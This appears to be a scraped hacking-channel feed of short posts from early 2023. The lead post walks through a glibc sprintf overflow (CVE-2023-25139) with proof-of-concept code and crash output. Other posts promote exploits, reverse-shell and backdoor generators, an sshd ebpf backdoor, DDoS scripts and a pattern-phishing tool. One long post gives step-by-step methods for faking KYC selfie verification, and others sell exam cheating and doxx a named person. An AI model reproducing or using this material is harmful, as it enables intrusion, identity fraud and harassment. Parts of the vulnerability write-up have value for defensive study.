🔥🔥🔥glibc-2.37 - incorrect printf output for integers with thousands separator and width field(CVE-2023-25139, BOF)sprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.Consider the following C program:#include <stdio.h>#include <locale.h>int main (void){ if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); } return 0;}and try it with a locale that has a thousands separator, such as "LC_ALL=en_US.utf8".With glibc up to 2.36, Vincent get as expected:1234567890123:+1,234,567 :Confirmed that this could potentially cause a buffer overflow with sprintf, something like below. This will occur in the corner case where an application computes the size of buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.#include <stdio.h>#include <locale.h>#include <string.h>int main (void){ char buf[strlen ("1234567890123:") + 1]; __builtin_memset (buf, 'x', sizeof (buf)); if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); sprintf (buf, "%0+ -'13ld:", 1234567L); for (size_t i = 0; i < strlen ("1234567890123:") + 1; i++) { printf ("%c", buf[i]); } printf ("\n"); } return 0;}To finish, building with _FORTIFY_SOURCE should catch this problem immediately:💾$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.cAnd run:💾$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test1234567890123:+1,234,567 :*** buffer overflow detected ***: terminatedAborted (core dumped)🛡Fixed here( github mirror, backport to release/2.37/master ): "Account for grouping in printf width".
2023-02-11 03:02:35
2023-02-10 12:35:29
2023-02-10 12:35:28
2023-02-10 11:54:38
Huge !! ❤️ 🇮🇳Probably In response of recent MEA mail Server attack APT Group Sidewinders Hackers Have Compromised 7.5 TB of Email and Official Data Of Ministry Of Foreign Affairs Pakistan.Indian Email Data of Almost 25GB was on darkweb. Investigation of Indian mail server breach is already in process.
2023-02-10 11:26:26
2023-02-10 09:46:53
0Day Avalanche Blockchain API Dos POC Video
2023-02-10 09:36:35
OWASP WrongSecrets | Vulnerable app with examples showing how to not use secrets
2023-02-10 07:00:41
2023-02-10 06:54:10
Ministry of Foreign Affairs Pakistan7.5 TB of Internal & Email Data is compromised. Few Samples Attached@sidewinders
2023-02-10 05:38:17
2023-02-10 05:35:20
Pakistani Diplomat Sexual Harassment with Amna Umer Barcelona.
2023-02-10 01:17:39
FATF PAKISTAN MEETING WAS BREACHED.Just Before being out of Grey List.
2023-02-09 15:24:07
This time not only blog but let's learn with a detailed step by step videoIf you like our content then please support us by subscribing and watching full video.Let's grow and spread Cyber Security
2023-02-09 15:17:03
A new Blog on Metasploit.Learn Metasploit in professional way like Cyber security professionals.Here is the link to the detailed blog.
2023-02-09 14:36:31
Today I ffound A so cold FB,Insta And Google HackerTelegram Name:- SavataHer no. +91 63628 93283Real_Name : rajni kaneriLocation: karnataka
2023-02-09 11:00:52
🧰OperatorsKit is a collection of tools that integrate with Cobalt Strike through BOFs.Link:-
2023-02-09 10:06:25
IoT-PTA Virtual environment for Pentesting IoT Devices
2023-02-09 09:50:22
You don't need to buy a GPU for machine learning work!There are other alternatives. Here are some:1. Google Colab2. Kaggle3. Deepnote4. AWS SageMaker5. GCP Notebooks6. Azure Notebooks7. Cocalc8. Binder9. Saturncloud10. Datablore11. IBM Notebooks Spend your time focusing on your problem.💪💪 Let others worry about the hardware!!
2023-02-09 07:21:53
ssc-asi-tools - SecurityScorecard Attack Surface Intelligence tools repository with a python suite of tools.Link:-
2023-02-08 17:54:03
2023-02-08 17:54:02
2023-02-08 17:22:44
Blue Team / Incident Respornse 👨‍💻This github repository contains a collection of 35+ tools and resources that can be useful for blue teaming activities. #BlueTeam #Infosec
2023-02-08 16:58:20
2023-02-08 09:21:48
Recovery script for ESXiArgs ransomwareRecovery Script:-
2023-02-07 10:10:28
2023-02-07 09:32:45
Mobile Application Penetration Testing Cheat Sheet 📒#Infosec #Android #Ios #Tech #Cyber #BugBounty #Security
2023-02-07 09:31:21
Mini description of linux file permissions. Found this helpful!#Linux #infosec #cybersecurity
2023-02-07 05:27:04
exploit for an actively exploited zero-day vulnerability affecting the GoAnywhere MFT administration consoles.Exploit:
2023-02-07 01:19:18
2023-02-07 01:19:17
2023-02-06 14:06:32
Apache SCXML RCE (PoC included) + ArticleLink:-
2023-02-06 13:35:29
A new post for those who want to learn Metasploit and Meterpreter.Hi Cyber learnersCheck my new post + Video on Metasploit and Meterpreter.How to Use Metasploit | Meterpreter | Reverse shell | Metasploit Tutorial
2023-02-06 11:13:59
All Common Ports Enumerations and Exploitations
2023-02-06 10:24:47
2023-02-06 08:22:22
A public collection of POCs & Exploits for the vulnerabilities I discovered
2023-02-05 18:03:51
2023-02-05 18:03:50
2023-02-05 13:00:40
Hi, all a new blog on Smurf attack is now hereLearn the technique to perform this Ddos attack.Here is the link to the blog
2023-02-05 06:07:31
2023-02-04 16:10:35
Microsoft Exchange: OWASSRF + TabShell (CVE-*2022-41076)*The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.For a detailed write see research:*PoC: * #ssrf #tabshell #poc@virus303@NetEditors
2023-02-04 15:27:28
📡Space Jam: Exploring Radio Frequency Attacks in Outer SpaceDownload:-
2023-02-04 14:53:20
CVE-2021-21974 | Ransomware targeting VMware ESXiThese attacks are detected globally and especially in Europe. According to experts from the ecosystem as well as autorities, they might be related to Nevada ransomware and are using CVE-2021-21974 (OpenSLP as used in ESXi has a heap-overflow vulnerability) as compromission vector. Investigation are still ongoing to confirm those assumptions.Exploit:-
2023-02-04 12:29:43
Want to learn about OSINT (Open Source Threat Intelligence and Threat Intelligence Tools?Check our new blog on:What is OSINT? | OSINT Framework | Tools for OSINT | Best OSINT TechniquesHere is the link to his blog.
2023-02-04 12:05:07
CVE-2023-25135vBulletin - RCE + exploitLink:-
2023-02-04 10:10:09
CVE-2022-22583 CVE-2022-22616 CVE-2022-22639 CVE-2022-26690 CVE-2022-26712 CVE-2022-26728 CVE-2022-32786 CVE-2022-32800
2023-02-04 08:35:58
🪂 Standout as Web design Expert Course 🪂Download link-🔐 Zip Password- @udemyking1✦•━━━━━━━━━━━━━━━━━•✦👉 𝑀𝑢𝑠𝑡 𝐿𝑖𝑘𝑒 & 𝐹𝑜𝑙𝑙𝑜𝑤 𝑂𝑢𝑟 𝑃𝑎𝑔𝑒𝑠👇🔷 𝒀𝒐𝒖𝑻𝒖𝒃𝒆 ➛🔶 𝑭𝒂𝒄𝒆𝒃𝒐𝒐𝒌 ➛🔷 𝑳𝒊𝒏𝒌𝒆𝒅𝑰𝒏 ➛🔶 𝑰𝒏𝒔𝒕𝒂𝒈𝒓𝒂𝒎 ➛🔷 𝑱𝒐𝒊𝒏 𝑭𝒂𝒔𝒕 ➛✦•━━━━━━━━━━━━━━━━━•✦
2023-02-03 22:28:22
2023-02-03 22:28:21
2023-02-03 14:54:19
2023-02-03 11:42:03
2023-02-03 08:37:11
💥Cobalt Strike BOF that bypasses AMSI in a remote process with code injection.Download:-
2023-02-03 08:36:23
Needle (CVE-2023-0179) exploitDownload:-
2023-02-03 08:33:23
💥If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE.
2023-02-02 23:00:59
🔥🔥🔥Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit(CVE-2023-21608)Download:
2023-02-02 22:49:09
🔥Chrome heap buffer overflow in validating command decoder(CVE-2022-4135) Heap BoF/OOB access in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a SBX via a crafted HTML page.🛡Patch CLExploit strategy:The vulnerability immediately provides an attacker with an extremely powerful exploitation primitive -- a non-linear BoF with a controlled offset.Exploit flow:The exploit abuses the command buffer and GLES2 APIs for memory manipulation. A corrupted memory bucket is used to first leak data from the GPU process and break ASLR, and then, when the ROP chain is ready, hijack the control flow.reproduce:<script> canvas = document.createElement("canvas"); document.documentElement.appendChild(canvas); context = canvas.getContext("webgl2"); context.blendColor(0, 0, 0, 0);</script>⚠️Part of an exploit chain: CVE-2022-4135 + CVE-2022-3723
2023-02-02 22:42:46
🔥Brave browser 1 day exploit.This is a remote crash that triggers in brave browser due to how the rss XML parsing happens by reading an item's title that contains the < (less than) character.Download:
2023-02-02 18:45:54
2023-02-02 11:45:06
2023-02-02 10:01:44
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6download:
2023-02-02 09:48:32
#RedTeam #hack #toolsCollection of 100+ tools and resources that can be useful for red teaming activities.
2023-02-02 09:23:49
📲Enzyme is an jailbreak-free iOS modding framework that allows you to statically patch and hook iOS apps. This repository contains an example using Enzyme. For modifying this, check out the CMakeLists.txt file, the patcher/ file, the patcher/bootstrap.asm file, and the src folder.Download:-
2023-02-02 05:04:52 my Motivational And Infosec Blogs.
2023-02-02 04:57:51 @hacklathon
2023-02-02 04:56:05
2023-02-01 12:33:08
Master OAuth 2.0 Vulnerability #bugbounty #infosec  Difficulty : Any OAuth 2.0 Resources :👇• • • • • • • • • • • • • • • • • • • • • • • • You For Reading this 🙏Hope You'll like 👍 it
2023-02-01 10:33:30
2023-02-01 09:50:05
2023-02-01 09:40:48
2023-01-31 13:12:37
🔥🔥🔥VMware vRealize Log Insight VMSA-2023-0001 Technical Deep DiveThis vulnerability is exploitable in the default configuration for VMware vRealize Log Insight. We have successfully reproduced this exploit and would like to provide the technical details about how this vulnerability works. 💥PoC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs:💾 VMware vRealize Log Insight Directory Traversal Vulnerability(CVE-2022-31706)💾 VMware vRealize Log Insight broken access control Vulnerability(CVE-2022-31704)💾 VMware vRealize Log Insight contains an Information Disclosure Vulnerability(CVE-2022-31711)Download:
2023-01-31 11:43:12
PoC of CVE-2021-34514(Windows Kernel EoP vuln, ALPC OOB)Download:
2023-01-31 09:55:09
CVE-2022-26485 exploit(UAF in XSLT parameter processing, bugzilla )Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. Mozilla have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0. ⚠️Tested against Firefox 78.0 (Windows)Download:
2023-01-31 07:17:44
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.This will help to bypass WAF and execute PHP reverse shell for RCE.Download:
2023-01-30 16:59:32
OSINT tool to investigate GitHub profiles your WhatsApp messages on Telegram Windows x86 API hooking and modification directory and files from cli to ios and android devices without need of an extra clien app
2023-01-30 16:59:31
 CVE-2023-23560 flaw exposes 100 Lexmark printer models to hack
2023-01-30 09:47:36
hackebds(2023.1.29 0.3.3)Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|Generate bind of various architectures bind_Shell file.Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fastDownload:
2023-01-30 09:39:12
MYBB_1.8.32_LFI_RCEMyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…Download:
2023-01-30 09:32:05
2023-01-30 09:31:49
2023-01-29 17:22:07
⚙️ Complete Bug Bounty tool List ⚙️Enjoy :)dnscan https://nmap.orgMasscan Machine https://web.archive.orgwaybackurls Sn1per Apktool Injector JSON Web Token Toolkit the Web Tools @freehackingresources
2023-01-29 17:17:00
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..♾♾
2023-01-29 12:18:56
2023-01-29 11:56:55
Exploit for full access to disk C:\  (for all users)Download:
2023-01-29 10:39:34
Bugbounty Notes 📒Inclue OWASP Top 10 And more#bugbounty #InfsoecAmazing Git Repo : This Out 👌
2023-01-29 08:37:29
2023-01-29 05:47:41
2023-01-29 01:43:39
Rust PDF builderIt includes these premade templates:- adobeacrobate- dropbox- googledrive- office365- onedriveCustom Templates (Own PDF files) will also work.Usage: rust-pdf-creator.exe <input_url> <template/file/list>Example: rust-pdf-creator.exe onedrive. Download:
2023-01-28 13:50:01
2023-01-28 12:36:22
KillMyOTAOTA Killer for iOS 15.0 - 16.1.2Download:-
2023-01-28 12:35:06
#DDoS Scripts and MethodsL7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.Note: Scripts written in 'C' need to be compiled with GCC compiler, first.
2023-01-28 12:33:17
sshd_backdoorAbout Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.Main Process in ebpf program:Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.Download Link:
2023-01-28 12:29:19
2023-01-28 11:30:45
2023-01-28 05:18:17
gg's hacker's ( have a good day —❤️ ‼️Here we go again Get a (.in) Free Domain for 1 Year! Offer valid from 26-30th January 2023. condition is youw ill get 1 Domain for Free.Website #hacker_bano_chutiya_nhe 🌜👾🌛
2023-01-28 02:11:30 join this channel for more updates .........
2023-01-28 02:10:59
Sourcecode & Sensitive Leaks.NTDC Tripping Server.
2023-01-27 14:44:02
Dear all user's i am deleting this id sorry and wait @hayper007. I am coming with new account Don't sand msg 2hrsRe promot me 😂
2023-01-27 14:02:59
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2023-01-27 09:08:56
2023-01-27 09:08:55
2023-01-27 07:11:23
#Red_Team_Tactics1. Proxying DLL Loads For Hiding ETWTI Stack Tracing Python module for running BOFs
2023-01-27 07:11:22
#Sec_code_reviewStatistical Analysis to Detect Uncommon Code
2023-01-27 06:24:41
Whacking a phishing admin panel for fun and profit January 26, 2023 at 10:32AM by thehunter699via reddit
2023-01-27 06:23:37
Gank-RECONSubdomains enumeration, various scans and testing of some vulnerabilities.
2023-01-27 06:20:27
OpenCVeOpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.
2023-01-26 13:57:41
#Malware_analysis"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.]-> LODEINFO Triage Tools:
2023-01-26 13:57:40
#exploit1. CVE-2022-38181:Vulnerability in the Arm Mali GPU CVE-2023-0210:Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
2023-01-26 13:57:39
#Threat_Research#Blue_Team_Techniques1. At the Edge of Tier Zero: The Curious Case of the RODC Sigma Rule to Detect Uncommon Keyboard Layout Loads]-> Sysmon Config:
2023-01-26 12:19:51
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️#GiveawayOnRepublicDayTryHackMe 1 Month 3 Vouchers Giveaway...If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe IDWe'll review your TryHackMe account and based on your progress we will try to ask some basic questions...After that you will be given your TryHackMe Coupon...Dm :- @lexlegion☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
2023-01-26 09:59:28
2023-01-26 06:13:37
Pakistan, Papa logo Ko happy republic day bolo.
2023-01-26 02:17:44
Gantantra diwas ki hardik shubhkamnaye ❤️
2023-01-25 20:50:10
2023-01-25 17:44:03
Mullvad VPN Key  7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 daysEnjoy all 😂
2023-01-25 13:20:43
2023-01-25 11:49:25
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!
2023-01-25 08:30:27
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰Ⓜ️REQUIREMENTS :Internet : 50 MBphpStorage : 50 MBngrok Features :[+] Real pattern hacking ![+] Updated maintainence ![+] Ngrok link[+] Easy for Beginners !INSTALLATION [Termux] :$ apt-get update -y$ apt-get upgrade -y$ pkg install python -y$ pkg install python2 -y$ pkg install git -y$ pip install lolcat$ git clone$ cd $HOME$ ls$ cd hacklock$ ls$ bash setup$ bash[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...[+]--You will recieve patter pin in below image you can see pattern with numbers[+]--You can select any option by clicking on your keyboard[+]--Note:- Don't delete any of the scripts included in core〰〰〰〰〰〰〰〰〰〰〰〰〰
2023-01-25 06:46:01
#hardeningA tool for checking the security hardening options of the Linux kernel
2023-01-25 06:46:00
#Red_Team_Tactics1. Elevation of Privilege from Local Admin to gMSA Keeping LSA secrets out of physical memory Basic SSTI - Server-Side Template Injection (2023)
2023-01-25 03:13:25
2023-01-25 02:35:45
Internet Camera Exploitation ToolThis is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.ioI was able to discover thousands of vulnerable cameras using itTool:-
2023-01-25 02:33:44
WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated)] Date: 04/16/2022Exploit:-
2023-01-24 13:44:38
#Research"StealthyIMU: Stealing Permission-protected Private Information From Smartphone Voice Assistant Using Zero-Permission Sensors", NDSS 2023.]-> Repo:
2023-01-24 13:44:37
#exploit1. A Step-By-Step Introduction To The Use Of ROP Gadgets To Bypass DEP b3typer - Simple typer bug CVE-2022-2347:U-Boot - Unchecked Download Size/Direction in USB DFU
2023-01-24 13:44:36
#Malware_analysis1. Analyzing Malicious OneNote Documents Roaming Mantis implements new DNS changer in its malicious mobile app in 2022
2023-01-24 08:17:35
A #browser_extension for OSINT search all-in-one Red Team #extension for Web Pentest
2023-01-24 07:19:05
Bug : Facebook Group Members DisclosureIntro : A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation.Video POC:-
2023-01-24 03:29:55
Java XML security issues and how to address them
2023-01-23 17:54:51
2023-01-23 16:17:49
#DFIRShareFinder: How Threat Actors Discover File Shares
2023-01-23 16:17:48
#Threat_ResearchTraffic signals: The VASTFLUX Takedown
2023-01-23 16:17:47
#AnalyticsCybersecurity Trends Q1/23:⬆️ Pwd spraying/creds stuffing; ⬆️ Phishing w/ new file types, eg .one, .iso, .lnk;⬆️ Rust malware / loaders (+Go +Nim +Zig);⬆️ Sliver implants; ⬆️ Abused legit RA software;⬆️ Abused legit encryption tools (ransom);⬆️ Token/Cloud API abuse;⬇️ Malware attacks on non-standard ports;⬇️ E-Skimming Incidents;⬇️ Office Macros.
2023-01-23 16:17:46
#Offensive_security1. Cobalt Strike Beacon Object File for kernel exploitation using AMD's Ryzen Master Driver (version 17) A script to automate privilege escalation with CVE-2023-22809 vulnerability
2023-01-23 15:47:01
SQLi Hunter v2 is a python program that checks for SQL (and Blind) injection vulnerability in URL’s. The program is designed to be easy to use, practical and beneficial. The intention of this tool is to include it in your ethical Bug Bounty Hunting methodology. Please do not use this tool on any website without having its permission.
2023-01-23 15:40:32
PhoneSploit ProPhoneSploit with Metasploit Integration.An All-In-One hacking tool to remotely exploit Android devices using ADB and Metasploit-Framework to get a Meterpreter session.
2023-01-23 15:23:21
Echidna – A Fast Smart Contract FuzzerEchidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)
2023-01-23 11:51:52
[META BUG BOUNTY 2023] - Video Poc
2023-01-23 11:43:26
CVE-2023-22809 – sudo Privilege escalationAffected sudo versions: 1.8.0 to 1.9.12p1This script automates the exploitation of the CVE-2023-22809 vulnerability to gain a root shell.Script:
2023-01-23 10:28:32
Solaris 10 LPE ExploitDownload:
2023-01-23 06:07:47
90% Pakistan is out of electricity after major cyber attack on electricity systems.बिजली प्रणालियों पर बड़े साइबर हमले के बाद 90% पाकिस्तान में बिजली गुल।
2023-01-23 00:05:53
Hi Techies, Ethical Hackers and Cyber security enthusiasts. I am offering a great opportunity to you all to work with us at Techofide.Here is the link to apply: for your responses everyone! Have a great day😀
2023-01-22 17:58:02
#toolsUtility to find hidden Linux kernel modules]-> LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64):
2023-01-22 17:58:01
#exploit1. CVE-2022-42864:Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition") CVE-2022-25637:Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)
2023-01-22 15:38:13
2023-01-22 15:38:12
📚 ILLEGAL7 HACKERS ALL COURSES 📚Software cracking🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course🟢Ransomware virus course 🟢Reverse Engineering Course🟢Software Cracking CourseSize : 6.11 GB⬇️Link :- : Theillegalhacker7@@@
2023-01-22 10:38:25
CVE-2023-0398 modoboa – mail ServerDescriptionGET /admin/domains/{id}/delete/ page is vulnerable to a CSRF attack.Exploit:
2023-01-22 10:11:29
Facebook 0-day Bug (account takeover) Still not patchedcheck out now :
2023-01-22 09:47:29
2023-01-22 05:54:36
2023-01-22 04:18:10
2023-01-22 02:23:55
2023-01-21 17:01:11
#UAV #UAS #UUV #forensics #security #vulnerabilities
2023-01-21 17:01:10
🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌Translation: ru-en🕵️‍♂️Twitter Search Guide (Advanced)🕵️‍♂️Twitter Search Guide (extended version)#osint #twitter‌‌
2023-01-21 13:25:49
2023-01-21 13:25:48
2023-01-21 13:20:36
Linux kernel stack buffer overflow in nftables(CVE-2023-0179)The vulnerability consists of a stack BOF due to an integer underflow vulnerability inside the nft_payload_copy_vlan function, which is invoked with nft_payload expressions as long as a VLAN tag is present in the current skb.⚠️The exploitation could allow the leakage of both stack and heap addresses and, potentially, a LPE to the root user via arbitrary code execution.Exploit:
2023-01-21 13:00:01
Get GPT like chatGPT on your terminal
2023-01-21 12:09:35
#Blue_Team_Techniques"Best Practices for MITRE ATT&CK Mapping", January 2023.
2023-01-21 12:09:34
#DFIRThe Key to Identify PsExec
2023-01-21 12:09:33
#tools#Cloud_Security1. Kubernetes exploitation tool Azure Attack Paths Management
2023-01-21 10:59:04
2023-01-21 03:08:26
2023-01-20 19:37:19
Поисковая система запустила чат-бота с искусственным интеллектом, под названием youChat 💻 Чат-бот способен отвечать на вопросы, и вести разговоры, на подобии с ботом ChatGPT, хотя и имеет значительно меньший функционал, относительно последнего. Разработчики заявляют, что добавление youChat значительно расширяет возможности поиска нужной информации в Интернете. Так, он в состоянии помочь с простыми ответами на общие вопросы, предложением идей, перевода, обобщении текста, составлении электронных писем, а также написании кода. Тем не менее система пока находится в бета-тестировании, и разработчики не рекомендуют принимать на веру все ответы, что выдаёт бот.
2023-01-20 19:25:04
#exploit1. CVE-2022-47966:RCE vulnerability in multiple ManageEngine (Apache Santuario (xmlsec) <=1.4.1) products]-> CVE-2022-39955:Charset confusion + WAF bypasses via 0days Microsoft Teams RCE
2023-01-20 13:25:05
Android Exploit to get a System based shell (UID 1000) on ANY Samsung Mobile Device based on CVE-2019-162531) Downgrade to vulnerable SamsungTTS app2) Install exploit APK3) Exploit vulnerability to achieve System rights
2023-01-20 12:50:43
🔥🔥🔥FoxitReader Precise Heap Spray 0c0c0c0c bc.⚠️Testesd version:
2023-01-20 12:26:49
Google Chrome “SymStealer” (CVE-2022-3656)
2023-01-20 12:19:21
2023-01-20 11:12:24
Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoC January 19, 2023 at 12:33PM by qwerty0x41via reddit
2023-01-19 15:28:33
2023-01-19 15:09:30
2023-01-19 14:21:29
#exploit1. CVE-2023-0179:Linux kernel stack buffer overflow in nftables Security Audit of Git:CVE-2022-23521:Truncated Allocation Leading to Out of Bounds Write Via Large Number of AttributesCVE-2022-41903: Out of Bounds Memory Write in Log Formatting
2023-01-19 14:21:28
#tools#Blue_Team_Techniques1. MIMEDefang - e-mail filtering tool that works with the Sendmail "Milter" library Automated Penetration Testing Reporting System
2023-01-19 06:19:28
Some internal IPs from pak
2023-01-19 03:13:19
Learn SQLI In A Easy Way
2023-01-19 02:44:43
2023-01-18 08:01:43
2023-01-18 07:11:12
2023-01-17 18:09:35
After you have your TikTok account ready, open your selfie on you PC, make anew video on TikTok and select “Dynamic Photo” filter.After you selected your filter, point your camera to the selfie that's on you PC andyou will see that the selfie is moving, smiling, rotating their eyes, etc.Record a small video and upload it to TikTok (Make sure its public)After its uploaded, go to: (ticktock video downloader ) and paste your video link toDownload your video without the TikTok tag.After that its easy, go to OBS, under “Sources” select “Media” and select yourTikTok video that you just downloaded.My targeted website requires me to verify thru my phone.This part if you service only serve through AppsFor this, you would need a few tools:● LDplayer (Android Emulator)● Logitech capture softwareAfter you downloaded those 2 tools, create a new LDplayer android emulatorwindow and select 640x640 resolutionThen, open Logitech capture software, open you selfie/docs photo, selectresolution to 1080p and then in “Source 1” select your opened photo title. Thenhead to ManyCams, select camera source as “Logi Capture”.Then, head back to your android emulator, go do your kyc and when emulator askif you want to use webcam or screen crop, select webcam and you should seeyour uploaded photo right there, go on resize or change position of the photo ofyour needs and take the picture.Thats it! This should be enough to bypass a lot of kyc providers and will allow youto easily verify your account!Download links:OBS: capture:
2023-01-17 18:00:33
How To Bypass Selfie Verification❓Table of content● Know KYC Verification mechanism● How to fake live webcam● How to fake rotate head verification● How to make you selfie more alive● How to fake phone required kyc● ResourceOld Standart : Upload Document and Photo with Signature or Holding Written Name and service  on cardboard (example old binace if i remember correctly service before 2013 ?)ScanFace: Simple Request to scanning faceRotated head: Require you rotate you head folowing the circle Blink Life Test : Require you to blink follwong countdown orderID Card+Face Selfie + Mostly Populer among Indonesia Apps like E-wallet and exchangerFaking the WebcamMost of website this day enforce verification through selfie-life cam, site will ask you to allow turn on camera and record you face, which can have serios consequence if company you use are not good in keeping their data.There way to counter this defense  You need to download:● OBS (With virtual cam plugin)● ManyCams -- Not free please go to reddit piracy megathread to find safe and clean pirate versionSome of download links will be available at the last page of this thread.Install both of them and ready your docs.Now, open OBS and under “Sources” tab click on “+” and then “Image”Then, select your image path and press okay. You will see your selected image on OBS.Now, open ManyCams, go to “Text” tab and uncheck “Show ManyCams logo”Go back on OBS and click on “Start Virtual camera”Now, go back to your website that you try to verify and start the webcam verification, allowaccess and you should see your selected photo on the webpage.You can change the photo position (If you doing selfie verification, so the face would go into the“Head bubble”) on OBS by moving the picture or change the size of it by grabbing the corner ofthe photo. (Red line)"If your KYC puts you to fullscreen as soon as you start the verification and cancelsout if you exit the fullscreen, open OBS, then Start the verification and as soon asyou go to fullscreen, ALT+TAB to OBS window so the verification won't becancelled and you will be able to move your picture around.After that just size your picture to you needs and take the photo."This one of difficult partDamn, that was easy. But my verification requires me torotate my head.A lot of KYC requires you to do that. To bypass that, head to: and create an account there (It requires you to do aPost by @hayper007small donation to use their services, i highly advise you to do that as it will helpyou in your KYC bypass journey)After you successfully created your account and made a small donation, start anew project and then select “Image” and then “Add”.After that you will see your photo on the website, then you should see a smallmenu in the middle up, select “Mode to draw smooth shapes”.After you selected the correct mode, carefully draw a shape around your selfies head.After you did it, you should see your selected area lighter than the background.Post by @hayper007On the left side you will see a small box, select “Rotation mode” and slightly move your cursor in the box area to rotate the selected area.After you managed to make your selfie a 3D model, you can recordyour screen rotating your head and then in OBS under “Sources”tab selecting “Media source”Or, you could select “Window capture” and selecting the“Smoothie-3d” tab and rotating your head live when you doing yourKYC verification.Post by @hayper007Okay, but my selfie looks “Not real”, how do i make it morealive?Note: this part of method involving you using phone to create resource for part of method.Some of the HQ websites (Banks, main crypto exchange sites, etc) could see thatyour selfie is a plain photo as it doesn't have any “Liveliness” in it.To bypass that, you need 2 things.● TikTok account● Smartphone with working cameraIf you have that, go ahead and download TikTok and create an account.
2023-01-17 14:40:36
Post from @hayper007
2023-01-17 14:40:35
Post from @hayper007
2023-01-17 14:40:34
Post from @hayper007
2023-01-17 14:28:06
#Malware_analysis1. Analyzing Rhadamanthys Stealer BianLian Ransomware (Decrypted)
2023-01-17 14:27:36
Class Starting At 8:00 PmJoin Now Invite Link (Web) :
2023-01-17 14:18:22
#Hardware_SecurityHow Signal Works inside the Kernel
2023-01-17 14:18:21
#tools#Threat_Research1. Detection of Lateral Movement with the Sliver C2 Framework]-> Java code inspector for web vulnerability scan Survey of security mitigations and architectures, December 2022
2023-01-17 14:18:20
#exploit1. Redis 6.0.16 - RCE Linux kernel exploit development
2023-01-17 14:18:19
